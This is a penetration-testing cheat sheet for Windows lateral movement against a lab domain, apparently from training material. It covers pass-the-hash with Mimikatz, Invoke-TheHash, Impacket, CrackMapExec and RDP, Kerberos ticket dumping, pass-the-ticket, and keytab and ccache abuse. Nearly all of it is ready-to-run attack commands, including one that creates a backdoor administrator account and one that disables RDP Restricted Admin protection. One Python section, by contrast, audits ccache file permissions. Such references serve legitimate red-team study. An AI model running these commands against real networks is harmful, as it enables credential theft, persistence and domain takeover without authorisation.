# Windows Lateral Movement

### Pass The Hash (Mimikatz)

```powershell
mimikatz.exe privilege::debug "sekurlsa::pth /user:<user> /rc4:<hash> /domain:inlanefreight.htb /run:cmd.exe" exit
```

### Pass The Hash (Invoke-TheHash)

```powershell
# Import Module
Import-Module .\Invoke-TheHash.psd1

# Pass The Hash
Invoke-SMBExec -Target <IP> -Domain <domain> -Username <username> -Hash <hash> -Command "net user 0xF0rk Password123 /add && net localgroup administrators 0xF0rk /add" -Verbose

# With WMI
Invoke-WMIExec -Target DC01 -Domain <domain> -Username <user> -Hash <hash> -Command "powershell -e <base64 command>"
```

### Pass the Hash Impacket (Linux)

```bash
impacket-psexec administrator@<IP> -hashes :<hash>
```

### Pass The Hash CrackMapExec (Linux)

```bash
crackmapexec smb <IP> -u Administrator -d . -H <hash> --local-auth
```

### Pass The Hash RDP

```powershell
# On the target: enable Restricted Admin mode, which RDP needs to accept an NT hash instead of a password
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f

# From Linux: RDP with the hash
xfreerdp /v:<IP> /u:<user> /pth:<hash>
```

### Harvesting Tickets From Windows

```powershell
# Mimikatz
## Enable SeDebugPrivilege (needed to read LSASS)
privilege::debug

## Show and export tickets (.kirbi files)
sekurlsa::tickets /export

# Rubeus
Rubeus.exe dump /nowrap
```

### Pass the Key or OverPass the Hash

```powershell
# Mimikatz: extract Kerberos keys
privilege::debug
sekurlsa::ekeys

# Mimikatz: OverPass the Hash
sekurlsa::pth /domain:inlanefreight.htb /user:<user> /ntlm:<rc4_value>

# Rubeus
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /aes256:<aes256_hmac_Value>
```

### Pass the Ticket (PtT)

```powershell
# Rubeus
## /ptt injects the requested ticket into the current session
Rubeus.exe asktgt /domain:inlanefreight.htb /user:plaintext /rc4:<rc4_value> /ptt

# Import .kirbi
Rubeus.exe ptt /ticket:file.kirbi

# Base64-encode a .kirbi
[Convert]::ToBase64String([IO.File]::ReadAllBytes("file.kirbi"))

# Import from Base64
Rubeus.exe ptt /ticket:<base64>
```

#### Pass The Ticket PowerShell Remoting

```powershell
# Mimikatz: import the ticket
kerberos::ptt "file.kirbi"

# PowerShell Remoting with the imported ticket
Enter-PSSession -ComputerName <computername>
```

### Pass The Ticket (From Linux)

#### Check Linux Machine Domain Joined

```bash
realm list

ps -ef | grep -i "winbind\|sssd"
```

#### Find Keytab Files

```bash
# Quote the glob so the shell does not expand it in the current directory
find / -name "*keytab*" -ls 2>/dev/null
```

#### Find ccache Files

A credential cache or ccache file holds Kerberos credentials while they remain valid and, generally, while the user's session lasts.

```bash
# KRB5CCNAME points at the credential cache in use
env | grep -i krb5
```

#### Abusing KeyTab Files

```bash
# List the keys held in a keytab
klist -k -t /opt/specialfiles/carlos.keytab

# Impersonate another user with their keytab
kinit carlos@INLANEFREIGHT.HTB -k -t /opt/specialfiles/carlos.keytab

# Verify
klist
```

#### Keytab Extract

```bash
python3 /opt/blackbuntu/keytabextract.py file.keytab
```

#### Abusing ccache Files

To abuse a ccache file, all we need is read privileges on the file. These files, located in /tmp, can only be read by the user who created them, but if we gain root access, we could use them.

```bash
# Import ccache file
export KRB5CCNAME=<file>
klist

# Able to read DC
smbclient //dc01/C$ -k -c 'ls' --no-pass
```
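The two points above (a ccache is just a file, and whoever can read it can use it) turn directly into a host audit. The following is an added example, not from the original page: it parses the default principal out of an MIT format-version-4 ccache (the only version it handles; the sample cache it builds is constructed, with an empty header and no credentials) and flags caches that other local users can read or whose owner does not match the uid in the `krb5cc_<uid>` file name.

```python
import os
import stat
import struct

def parse_default_principal(data: bytes) -> str:
    """Return 'comp1/comp2@REALM' from an MIT ccache, format version 4 (0x0504) only."""
    if data[:2] != b"\x05\x04":
        raise ValueError("not a version-4 MIT ccache")
    off = 2
    (hdr_len,) = struct.unpack(">H", data[off:off + 2])
    off += 2 + hdr_len                      # skip the header tags (e.g. KDC time offset)
    _name_type, ncomp = struct.unpack(">II", data[off:off + 8])
    off += 8

    def read_field() -> str:
        nonlocal off
        (n,) = struct.unpack(">I", data[off:off + 4])
        off += 4
        field = data[off:off + n].decode("utf-8", "replace")
        off += n
        return field

    realm = read_field()                    # the realm precedes the name components
    return "/".join(read_field() for _ in range(ncomp)) + "@" + realm

def build_sample_ccache(principal: str) -> bytes:
    """Constructed sample: a v4 ccache with an empty header and no credentials."""
    name, realm = principal.split("@")
    comps = name.split("/")
    out = b"\x05\x04" + struct.pack(">H", 0) + struct.pack(">II", 1, len(comps))
    for field in [realm] + comps:
        out += struct.pack(">I", len(field)) + field.encode()
    return out

def assess_ccache(name: str, mode: int, owner_uid: int, data: bytes) -> dict:
    """Pure check: whose cache it is, and whether another local user could read it."""
    suffix = name.removeprefix("krb5cc_").split("_")[0]   # krb5cc_<uid>[_random]
    expected_uid = int(suffix) if suffix.isdigit() else None
    return {
        "principal": parse_default_principal(data),
        "readable_by_others": bool(mode & (stat.S_IRGRP | stat.S_IROTH)),
        "owner_mismatch": expected_uid is not None and expected_uid != owner_uid,
    }

def audit_ccache(path: str) -> dict:
    """Run assess_ccache against a real file, e.g. /tmp/krb5cc_1000."""
    st = os.stat(path)
    with open(path, "rb") as fh:
        return assess_ccache(os.path.basename(path), st.st_mode, st.st_uid, fh.read())
```

Either finding is worth an alert: a group- or world-readable cache, or a cache named for one uid but owned by another, means a ticket is exposed beyond the user it was issued to.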

#### Convert ccache file for Windows

```bash
# impacket ticketConverter: https://github.com/fortra/impacket/blob/master/examples/ticketConverter.py
python3 ticketConverter.py <file.ccache> <file.kirbi>
```

